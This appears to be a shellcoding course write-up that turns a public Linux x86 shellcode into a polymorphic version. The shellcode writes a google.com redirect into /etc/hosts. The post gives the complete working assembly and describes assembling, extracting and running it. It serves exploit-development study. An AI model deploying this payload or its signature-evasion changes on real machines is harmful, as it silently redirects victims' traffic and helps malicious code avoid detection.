6_2 - ADDING ENTRIES TO "/ETC/HOSTS" FILE
- Same concepts studied at 6_1 apply in this case.
2 - MODIFYING A SHELLCODE
- The original program to be modified in this practice has the effect of adding a new entry in hosts file pointing 127.1.1.1 to google.com:
http://shell-storm.org/shellcode/files/shellcode-893.php
- Let's see 3 possible modifications:
a) Based in the fact that any number AND-ed by itself is the same number, the junk instruction "and edx,edx" is introduced, which effect on the functionality of the program is null:
https://en.wikipedia.org/wiki/Truth_table#Logical_conjunction_.28AND.29
b) Instead of pushing "/etc///hosts" characters directly onto the stack, they are moved in chunks of 4 to the stack:
mov dword [esp-4],0x7374736f ; instead of pushing
mov dword [esp-8],0x682f2f2f ; /etc///hosts
mov dword [esp-12],0x6374652f ; is moved into esp
sub esp,0xc
c) Finally, instead of using the stack to load identifiers of syscalls, "mov" instruction is used. This method is used for write(20), close(6) and exit(1):
;push 20
;pop edx
mov dl,0x14 ; identifier (20) for write syscall is moved to dl
int 0x80
;push 0x6
;pop eax
mov al,0x6 ; identifier (6) for close syscall is moved to al
int 0x80
;push 0x1
;pop eax
mov al,0x1
int 0x80 ; identifier (1) for exit syscall is moved to al
- The resulting assembly program of applying these modifications is A6_2.nasm:
global _start
section .text
_start:
and edx,edx ; junk instruction with no effect
xor ecx, ecx
mul ecx
mov al, 0x5
push ecx
;push 0x7374736f ;/etc///hosts
;push 0x682f2f2f
;push 0x6374652f
mov dword [esp-4],0x7374736f ; instead of pushing
mov dword [esp-8],0x682f2f2f ; /etc///hosts
mov dword [esp-12],0x6374652f ; is moved into esp
sub esp,0xc
mov ebx, esp
mov cx, 0x401
int 0x80
xchg eax, ebx
push 0x4
pop eax
jmp short _load_data
_write:
pop ecx
;push 20
;pop edx
mov dl,0x14 ; identifier (20) for write syscall is moved to dl
int 0x80
;push 0x6
;pop eax
mov al,0x6 ; identifier (6) for close syscall is moved to al
int 0x80
;push 0x1
;pop eax
mov al,0x1
int 0x80 ; identifier (1) for exit syscall is moved to al
_load_data:
call _write
google db "127.1.1.1 google.com"
3 - TESTING POLYMORPHISM
- Assembling and linking A6_2.nasm:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJGZRxZchooqWAaSvGEIR0CDAk971gU_RzFCdNUMbU6McbihSCNyRdIMbXtZCE0GGGMXxwNdC4_IkIu_1Bzfou4Z_h4NXkqD8OyLXke3J41LVrmEKOtPARpRwflIM-XQHfc21lMLaKVYrM/s1600/screenshot.2.jpg)
- Extracting the shellcode:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRM-_GOpPKjp_LWPtdjLUkhv4fD7IF9CqyPAbMTr7HYJOJsVcPYYLeeRRiHLYJByudEWYXZCmIq5j792Jb0Hj3jZRRrkj69RSdVc6u9bMCgteGUaceqtvOyRaqRU4_IgvYHOUiJaMo6PGK/s1600/screenshot.11.jpg)
- Applying to ShellcodeTest.c program:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlcvcKjLirjJ-HznH94sWlwNMBC-7UBuDvm9Dy6eGgHikQ42bA1B43D2U-EeF2LPOUbs_fwTY1hzrPYKK-JkJHr7vToIi7AIsGu30cpn7Ia4oK59Lqq2r3Cb7PIXI-wcjzfmtS9BvXN3cD/s1600/screenshot.5.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtdiuqw0faCUNnXqx2s48q1Rbguw4iE2nyxmnM6D_VffQHno_OjZobpjclHKnD287iQ236jSSfEiFimsRPway9eNpMKpIHjOJW1VLtLkEo2l9rYKiKIY2gZTboykIuzzLA_ZvDpjHdAKY-/s1600/screenshot.12.jpg)
- Compiling ShellcodeTest.c:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBco98TSuQJrKadtC5rLP4q7tKFdJs4eFVDOns1WzYX-o4Ry2A_595u1AImbqjX77Oekmoj0iDmIzDp_PNCO9QMm4zejDMZtaI5ZAGOMVKPCXw_bXPpzJvJA5cgKqv3cwjqwr7P6hwivnO/s1600/screenshot.13.jpg)
- Executing ShellcodeTest.c:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgy5UywXzvzekzz4OKT2r1U921-MCJHl95KgZowUxkqu1rfcbM-SknUgAmS6vGLfH0rNRlFwrA3osPes1a5RvZ4BDMioiORbjYntGx5IoXWZcs9u71F5KFFuNzIUmwFC3u8-v-blcD65r9I/s1600/screenshot.14.jpg)
- The result is the same as the original program, a new entry is created into "/etc/hosts" file, pointing 127.1.1.1 to google.com:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6p5uEgFmRg79H5d5LmMv6Qb-crpzRDaofLUIk-oA6N4Px8OzIv_e5DCzhrghnPPUAsuSZ7cUKwT42Zmr_u_XeN3t7J1TLeU8xXpqc-Woi3yRhCPXc2xLqqFU6d_fUol-7ExkOp2I9ZZNW/s1600/screenshot.10.jpg)
- While the original shellcode had 77 Bytes, the new one has got 88 Bytes. It means an increment of 14%.